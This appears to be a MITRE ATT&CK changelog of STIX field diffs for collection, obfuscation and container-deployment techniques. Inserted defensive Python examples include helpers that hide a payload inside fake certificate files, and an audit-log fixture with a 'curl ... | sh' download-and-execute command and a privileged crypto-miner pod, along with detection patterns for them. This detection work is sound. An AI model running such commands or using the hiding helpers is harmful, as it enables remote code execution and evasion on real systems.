| external_references[1]['description'] | Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019. | Drew Todd. (2021, December 28). How Secure Is Your Slack Channel?. Retrieved May 31, 2022. |
| external_references[1]['url'] | https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/ | https://www.secureworld.io/industry-news/how-secure-is-your-slack-channel#:~:text=Electronic%20Arts%20hacked%20through%20Slack%20channel&text=In%20total%2C%20the%20hackers%20claim,credentials%20over%20a%20Slack%20channel. |
| external_references[2]['source_name'] | Microsoft Azure Storage Security, 2019 | Amazon S3 Security, 2019 |
| external_references[2]['description'] | Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20). Azure Storage security guide. Retrieved October 4, 2019. | Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide | https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/ |
| external_references[3]['source_name'] | Google Cloud Storage Best Practices, 2019 | Microsoft Azure Storage Security, 2019 |
| external_references[3]['description'] | Google. (2019, September 16). Best practices for Cloud Storage. Retrieved October 4, 2019. | Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20). Azure Storage security guide. Retrieved October 4, 2019. |
| external_references[3]['url'] | https://cloud.google.com/storage/docs/best-practices | https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide |
| external_references[4]['source_name'] | Trend Micro S3 Exposed PII, 2017 | EA Hacked via Slack - June 2021 |
| external_references[4]['description'] | Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed Almost 50 Thousand PII in Australia. Retrieved October 4, 2019. | Anthony Spadafora. (2021, June 11). EA hack reportedly used stolen cookies and Slack to target gaming giant. Retrieved May 31, 2022. |
| external_references[4]['url'] | https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia | https://www.techradar.com/news/ea-hack-reportedly-used-stolen-cookies-and-slack-to-hack-gaming-giant |
| external_references[6]['source_name'] | HIPAA Journal S3 Breach, 2017 | Google Cloud Storage Best Practices, 2019 |
| external_references[6]['description'] | HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019. | Google. (2019, September 16). Best practices for Cloud Storage. Retrieved October 4, 2019. |
| external_references[6]['url'] | https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/ | https://cloud.google.com/storage/docs/best-practices |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'HackerNews - 3 SaaS App Cyber Attacks - April 2022', 'description': 'Hananel Livneh. (2022, April 7). Into the Breach: Breaking Down 3 SaaS App Cyber Attacks in 2022. Retrieved May 31, 2022.', 'url': 'https://thehackernews.com/2022/04/into-breach-breaking-down-3-saas-app.html'} | |
| external_references | {'source_name': 'HIPAA Journal S3 Breach, 2017', 'description': 'HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019.', 'url': 'https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/'} | |
| external_references | {'source_name': 'Rclone-mega-extortion_05_2021', 'description': 'Justin Schoenfeld, Aaron Didier. (2021, May 4). Transferring leverage in a ransomware attack. Retrieved July 14, 2022.', 'url': 'https://redcanary.com/blog/rclone-mega-extortion/'} | |
| external_references | {'source_name': 'Dark Clouds_Usenix_Mulazzani_08_2011', 'description': 'Martin Mulazzani, Sebastian Schrittwieser, Manuel Leithner, Markus Huber, and Edgar Weippl. (2011, August). Dark Clouds on the Horizon: Using Cloud Storage as Attack Vector and Online Slack Space. Retrieved July 14, 2022.', 'url': 'https://www.usenix.org/conference/usenix-security-11/dark-clouds-horizon-using-cloud-storage-attack-vector-and-online-slack'} | |
| external_references | {'source_name': 'Trend Micro S3 Exposed PII, 2017', 'description': 'Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed Almost 50 Thousand PII in Australia. Retrieved October 4, 2019.', 'url': 'https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia'} | |
| x_mitre_contributors | AppOmni | |
| x_mitre_platforms | SaaS | |
| Description |
|---|
| Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices. Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-22 02:26:44.566000+00:00 | 2022-04-19 21:32:58.274000+00:00 |
| external_references[1]['source_name'] | US-CERT-TA18-106A | Cisco Advisory SNMP v3 Authentication Vulnerabilities |
| external_references[1]['description'] | US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. | Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020. |
| external_references[1]['url'] | https://www.us-cert.gov/ncas/alerts/TA18-106A | https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3 |
| external_references[3]['source_name'] | Cisco Advisory SNMP v3 Authentication Vulnerabilities | US-CERT-TA18-106A |
| external_references[3]['description'] | Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020. | US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020. |
| external_references[3]['url'] | https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3 | https://www.us-cert.gov/ncas/alerts/TA18-106A |
| Description |
|---|
| Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization. The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository: * Policies, procedures, and standards * Physical / logical network diagrams * System architecture diagrams * Technical system documentation * Testing / development credentials * Work / project schedules * Source code snippets * Links to network shares and other internal resources Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 01:35:43.938000+00:00 | 2022-04-11 22:28:36.395000+00:00 |
| external_references[1]['source_name'] | Microsoft SharePoint Logging | Atlassian Confluence Logging |
| external_references[1]['description'] | Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018. | Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018. |
| external_references[1]['url'] | https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2 | https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html |
| external_references[2]['source_name'] | Sharepoint Sharing Events | Microsoft SharePoint Logging |
| external_references[2]['description'] | Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October 8, 2021. | Microsoft. (2017, July 19). Configure audit settings for a site collection. Retrieved April 4, 2018. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events | https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2 |
| external_references[3]['source_name'] | Atlassian Confluence Logging | Sharepoint Sharing Events |
| external_references[3]['description'] | Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018. | Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October 8, 2021. |
| external_references[3]['url'] | https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html | https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Isif Ibrahima, Mandiant | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Isif Ibrahima | |
| Old Description | New Description |
|---|---|
| Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. | Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-15 22:16:42.734000+00:00 | 2022-10-19 21:55:54.866000+00:00 |
| description | Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. | Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information. Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. |
| x_mitre_data_sources[0] | Script: Script Execution | Process: OS API Execution |
| x_mitre_data_sources[2] | Command: Command Execution | Process: Process Creation |
| x_mitre_detection | Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to collect files such as configuration files with built-in features native to the network device platform.(Citation: Mandiant APT41 Global Intrusion )(Citation: US-CERT-TA18-106A) Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). |
| x_mitre_version | 1.3 | 1.5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Mandiant APT41 Global Intrusion ', 'description': 'Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.', 'url': 'https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits'} | |
| external_references | {'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'} | |
| x_mitre_contributors | Austin Clark, @c2defense | |
| x_mitre_data_sources | Script: Script Execution | |
| x_mitre_data_sources | Command: Command Execution | |
| x_mitre_platforms | Network | |
| Description |
|---|
| Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['David Tayouri'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-24 15:42:44.026000+00:00 | 2022-06-16 13:08:03.209000+00:00 |
| x_mitre_data_sources[0] | File: File Access | Network Share: Network Share Access |
| x_mitre_data_sources[1] | Network Share: Network Share Access | Network Traffic: Network Connection Creation |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Access | |
| x_mitre_data_sources | Network Traffic: Network Traffic Content |
| Old Description | New Description |
|---|---|
| Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. | Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:01.150000+00:00 | 2022-03-25 19:34:42.056000+00:00 |
| description | Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. | Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system. One such example is use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. (Citation: Carbon Black Obfuscation Sept 2016) Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) |
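The description above names two deobfuscation steps: `certutil -decode` of a payload hidden inside a certificate file, and `copy /b` reassembly of binary fragments. The following is an added example (not code from the ATT&CK entry or the cited Malwarebytes and Carbon Black reports) that reproduces both steps in Python and shows the check an analyst can apply to the output: a genuine DER certificate begins with an ASN.1 SEQUENCE byte (`0x30`), whereas a decoded payload that begins with `MZ` and carries a valid `e_lfanew` pointer to the `PE` signature is an executable. The "PE" used here is a constructed 128-byte header, not real malware.

```python
"""Added example: reproduce certutil -decode of a payload hidden in a
certificate file and copy /b reassembly of binary fragments, then classify
the result. The PE is a constructed 128-byte header, not real malware."""
import base64
import re

PEM_RE = re.compile(
    r"-----BEGIN [A-Z ]+-----\s*(?P<body>[A-Za-z0-9+/=\s]+?)\s*-----END [A-Z ]+-----"
)


def certutil_decode(pem_text: str) -> bytes:
    """What `certutil -decode in.crt out.bin` does: strip the PEM armor, base64-decode."""
    m = PEM_RE.search(pem_text)
    if not m:
        raise ValueError("no PEM block found")
    return base64.b64decode("".join(m["body"].split()))


def copy_b_concat(fragments: list) -> bytes:
    """What `copy /b part1+part2+part3 out.exe` does: raw concatenation in order."""
    return b"".join(fragments)


def wrap_as_certificate(blob: bytes) -> str:
    """Hide arbitrary bytes inside something that looks like a .crt file."""
    b64 = base64.b64encode(blob).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "-----BEGIN CERTIFICATE-----\n" + "\n".join(lines) + "\n-----END CERTIFICATE-----\n"


def looks_like_pe(blob: bytes) -> bool:
    """MZ at offset 0 and e_lfanew (offset 0x3C) pointing at the PE signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def classify_pem(pem_text: str) -> str:
    """A real DER certificate starts with an ASN.1 SEQUENCE (0x30); a PE does not."""
    blob = certutil_decode(pem_text)
    if looks_like_pe(blob):
        return "pe"
    if blob[:1] == b"\x30":
        return "der"
    return "other"


def build_fake_pe() -> bytes:
    """Constructed PE-shaped blob: 64-byte DOS header, e_lfanew = 0x40, then the PE signature."""
    dos = bytearray(b"MZ" + b"\0" * 0x3A)          # 60 bytes
    dos += (0x40).to_bytes(4, "little")            # e_lfanew
    coff = b"PE\0\0" + b"\x64\x86" + b"\0" * 58    # signature + Machine field, padded
    return bytes(dos) + coff


def split_and_hide(blob: bytes, cuts=(40, 100)) -> list:
    """Split the payload at the given offsets and wrap each fragment as a certificate."""
    bounds = [0, *cuts, len(blob)]
    return [wrap_as_certificate(blob[a:b]) for a, b in zip(bounds, bounds[1:])]


def recover(cert_files: list) -> bytes:
    """Analyst replay: decode each fragment, then reassemble in order."""
    return copy_b_concat([certutil_decode(c) for c in cert_files])
```

The point the split makes is that no single fragment passes a per-file PE check (the first one is too short to carry `e_lfanew`, the others do not start with `MZ`), which is exactly why an adversary bothers with `copy /b`; the check has to run on the reassembled output, or on the decode/concatenate commands themselves.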
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-09 14:42:23.122000+00:00 | 2022-05-05 04:05:42.508000+00:00 |
| external_references[1]['source_name'] | Malwarebytes Targeted Attack against Saudi Arabia | Volexity PowerDuke November 2016 |
| external_references[1]['description'] | Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017. | Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017. |
| external_references[1]['url'] | https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/ | https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/ |
| external_references[2]['source_name'] | Carbon Black Obfuscation Sept 2016 | Malwarebytes Targeted Attack against Saudi Arabia |
| external_references[2]['description'] | Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018. | Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017. |
| external_references[2]['url'] | https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/ | https://blog.malwarebytes.com/cybercrime/social-engineering-cybercrime/2017/03/new-targeted-attack-saudi-arabia-government/ |
| external_references[3]['source_name'] | Volexity PowerDuke November 2016 | Carbon Black Obfuscation Sept 2016 |
| external_references[3]['description'] | Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017. | Tedesco, B. (2016, September 23). Security Alert Summary. Retrieved February 12, 2018. |
| external_references[3]['url'] | https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/ | https://www.carbonblack.com/2016/09/23/security-advisory-variants-well-known-adware-families-discovered-include-sophisticated-obfuscation-techniques-previously-associated-nation-state-attacks/ |
| x_mitre_defense_bypassed[1] | Host intrusion prevention systems | Host Intrusion Prevention Systems |
| x_mitre_defense_bypassed[2] | Signature-based detection | Signature-based Detection |
| x_mitre_defense_bypassed[3] | Network intrusion detection system | Network Intrusion Detection System |
| Description |
|---|
| Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts) |
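The description lists the properties that make a deployed container dangerous: no network rules, no user limitations, an untrusted image, or a benign image that fetches and runs a payload at startup. The script below is an added example, not code from the ATT&CK entry or the cited Docker, Kubernetes or Aqua sources: it walks Kubernetes API-server audit events (the `audit.k8s.io/v1` shape, trimmed to the fields used) and reports `create` requests whose PodSpec has host networking, privileged or root containers, an image outside an assumed registry allow-list, or a `curl ... | sh` style command. The events are constructed; `registry.internal.example` is a placeholder.

```python
"""Added example: scan Kubernetes audit events for container deployments that
bypass normal restrictions. Events are constructed; the registry allow-list
is an assumption."""
import re

ALLOWED_REGISTRIES = ("registry.internal.example/",)  # assumed
TEMPLATED = {"deployments", "daemonsets", "replicasets", "statefulsets", "jobs"}
DOWNLOAD_EXEC_RE = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sh|bash)\b", re.I)


def _pod_spec(event: dict) -> dict:
    """Locate the PodSpec whether the object is a Pod, a templated workload, or a CronJob."""
    obj = event.get("requestObject") or {}
    resource = event.get("objectRef", {}).get("resource")
    if resource == "pods":
        return obj.get("spec", {})
    if resource in TEMPLATED:
        return obj.get("spec", {}).get("template", {}).get("spec", {})
    if resource == "cronjobs":
        return (obj.get("spec", {}).get("jobTemplate", {}).get("spec", {})
                .get("template", {}).get("spec", {}))
    return {}


def pod_findings(spec: dict) -> list:
    """Return the list of restrictions this PodSpec sidesteps (empty when clean)."""
    findings = []
    if spec.get("hostNetwork"):
        findings.append("hostNetwork (shares node network namespace)")
    if spec.get("hostPID"):
        findings.append("hostPID")
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        name = c.get("name", "?")
        sc = c.get("securityContext", {})
        if sc.get("privileged"):
            findings.append(f"privileged container {name}")
        if sc.get("runAsUser") == 0:
            findings.append(f"runs as root {name}")
        image = c.get("image", "")
        if not image.startswith(ALLOWED_REGISTRIES):
            findings.append(f"untrusted image {image}")
        cmdline = " ".join(c.get("command", []) + c.get("args", []))
        if DOWNLOAD_EXEC_RE.search(cmdline):
            findings.append(f"downloads and executes at runtime {name}")
    return findings


def scan_audit_log(events: list) -> list:
    """One record per suspicious create request, with who made it and through what client."""
    out = []
    for ev in events:
        if ev.get("verb") != "create":
            continue
        findings = pod_findings(_pod_spec(ev))
        if findings:
            ref = ev.get("objectRef", {})
            out.append({"user": ev.get("user", {}).get("username"),
                        "userAgent": ev.get("userAgent"),
                        "resource": ref.get("resource"), "namespace": ref.get("namespace"),
                        "name": ref.get("name"), "findings": findings})
    return out


# Constructed audit events (trimmed to the fields used here).
SAMPLE_EVENTS = [
    {"verb": "create", "user": {"username": "ci-deployer"}, "userAgent": "kubectl/v1.24.0",
     "objectRef": {"resource": "pods", "namespace": "prod", "name": "web-7f9c"},
     "requestObject": {"spec": {"containers": [
         {"name": "web", "image": "registry.internal.example/web:1.2",
          "securityContext": {"runAsNonRoot": True}}]}}},
    {"verb": "create", "user": {"username": "system:serviceaccount:kubeflow:pipeline-runner"},
     "userAgent": "Mozilla/5.0",
     "objectRef": {"resource": "pods", "namespace": "kubeflow", "name": "miner"},
     "requestObject": {"spec": {"hostNetwork": True, "containers": [
         {"name": "xmr", "image": "docker.io/someone/xmrig:latest",
          "securityContext": {"privileged": True}}]}}},
    {"verb": "get", "user": {"username": "alice"},
     "objectRef": {"resource": "pods", "namespace": "prod", "name": "web-7f9c"}},
    {"verb": "create", "user": {"username": "alice"}, "userAgent": "kubectl/v1.24.0",
     "objectRef": {"resource": "deployments", "namespace": "dev", "name": "dropper"},
     "requestObject": {"spec": {"template": {"spec": {"containers": [
         {"name": "fetch", "image": "registry.internal.example/curl:8",
          "command": ["sh", "-c", "curl -s http://203.0.113.5/p | sh"],
          "securityContext": {"runAsUser": 0}}]}}}}},
]
```

The second sample event is the "malicious image" case (privileged, host networking, public registry, created through a browser-style client); the fourth is the "benign image" case from the Aqua citation, where the image is trusted but the command pulls and runs a payload at start. Both are caught; the first event and the read-only `get` are not. Audit events only carry `requestObject` when the audit policy level is `Request` or `RequestResponse`, so set that for pod and workload creates before relying on this.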
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 12:02:20.641000+00:00 | 2022-04-01 13:14:58.939000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Container: Container Start | |
| x_mitre_data_sources | Pod: Pod Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Container: Container Start | |
| x_mitre_data_sources | Pod: Pod Creation |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well. Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) | Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well. Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016) |
